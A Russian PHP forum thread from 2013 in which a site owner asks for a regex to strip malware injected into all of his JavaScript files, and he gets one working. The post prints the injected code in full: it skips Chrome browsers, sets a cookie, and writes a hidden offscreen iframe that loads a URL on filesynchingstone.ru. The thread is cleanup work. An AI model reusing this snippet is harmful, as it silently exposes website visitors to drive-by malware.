Warning: Cannot use a scalar value as an array in /home/admin/public_html/forum/include/fm.class.php on line 757

Warning: Invalid argument supplied for foreach() in /home/admin/public_html/forum/include/fm.class.php on line 770

Warning: Invalid argument supplied for foreach() in /home/admin/public_html/forum/topic.php on line 737
Форумы портала PHP.SU :: Помогите составить регулярку

 PHP.SU

 Программирование на PHP, MySQL и другие веб-технологии
PHP.SU Портал     На главную страницу форума Главная     Помощь Помощь     Поиск Поиск     Поиск Яндекс Поиск Яндекс     Вакансии  Пользователи Пользователи


 Страниц (1): [1]   

> Описание: Вирус в js
Поиск в теме | Версия для печати
ginec
Отправлено: 04 Мая, 2013 - 09:29:02
Post Id



Новичок


Покинул форум
Сообщений всего: 41
Дата рег-ции: Окт. 2010  


Помог: 0 раз(а)
Всем привет! Помогите составить регулярку для массовой замены в js файлах. Вздули сайт и во всех js такой код прилеплен.
Причем комменты меняются /*214afaae*/ Т.е. тут наверное надо юзать \/\*(.*)\*\/
в PHP так же был обнаружен вредоносный код, его почистил

Сделал /^\/\*(.*)\*\/(.*)filesynchingstone(.*)\}\)\(\);(\/\*(.*)\*\/)/s
но захватывает все до последнего коммента, если комментов в файле нет, то работает нормально.


CODE (javascript):
скопировать код в буфер обмена
  1. /*214afaae*/(function(){
  2. function stripos (f_haystack, f_needle, f_offset) {
  3.  var haystack = (f_haystack + '').toLowerCase();
  4.  var needle = (f_needle + '').toLowerCase();
  5.  var index = 0;
  6.  if ((index = haystack.indexOf(needle, f_offset)) !== -1) {
  7.   return index;
  8.  }
  9.  return false;
  10. }
  11. function papirosa(){
  12.  var denyList = ['Chrome'];
  13.  var denyUA = false;
  14.  for (var i in denyList) {
  15.   if (stripos(navigator.userAgent, denyList[i])) {
  16.    denyUA = true;
  17.    break;
  18.   }
  19.  }
  20.  return denyUA;
  21. }
  22. function setCookie(name, value, expires) {
  23.  var date = new Date( new Date().getTime() + expires*1000 );
  24.  document.cookie = name+'='+value+'; path=/; expires='+date.toUTCString();
  25. }
  26. function getCookie(name) {
  27.  var matches = document.cookie.match(new RegExp( "(?:^|; )" + name.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g, '\$1') + "=([^;]*)" ));
  28.  return matches ? decodeURIComponent(matches[1]) : undefined;
  29. }
  30. if (!papirosa()) {
  31.  var cookie = getCookie('b19ad018sc');
  32.  if (cookie == undefined) {
  33.   setCookie('b19ad018sc', true, 292200);
  34.   document.write('<iframe height="117" style="position:absolute;left:-1000px;top:-1000px;" width="117" src="http://filesynchingstone.ru/mhg7.fOxVhIC?default"></iframe>');
  35.  }
  36. };
  37. })();/*eaa795220*/
 
 Top
DeepVarvar Супермодератор
Отправлено: 04 Мая, 2013 - 09:52:32
Post Id



Активный участник


Покинул форум
Сообщений всего: 10377
Дата рег-ции: Дек. 2008  
Откуда: Альфа Центавра


Помог: 353 раз(а)
ginec пишет:
но захватывает все до последнего коммента
U
 
 Top
ginec
Отправлено: 04 Мая, 2013 - 10:05:59
Post Id



Новичок


Покинул форум
Сообщений всего: 41
Дата рег-ции: Окт. 2010  


Помог: 0 раз(а)
DeepVarvar, спасибо за ответ. С u моя регулярка не работает Огорчение
(Добавление)
ееее )))
получилось
Сделал так /^\/\*(.*)\*\/(.*)filesynchingstone(.*)\}\)\(\);\/\*(.*?)\*\//s
Проблема была в /*(.*?)*/ добавил модификатор ?
DeepVarvar спасибо, что откликнулся!
 
 Top
Поиск в теме | Версия для печати
Страниц (1): [1]
Сейчас эту тему просматривают: 0 (гостей: 0, зарегистрированных: 0)
« Регулярные выражения »


Все гости форума могут просматривать этот раздел.
Только зарегистрированные пользователи могут создавать новые темы в этом разделе.
Только зарегистрированные пользователи могут отвечать на сообщения в этом разделе.
  



Powered by PHP  Powered By MySQL  Powered by Nginx  Valid CSS  RSS

 
Powered by ExBB FM 1.0 RC1. InvisionExBB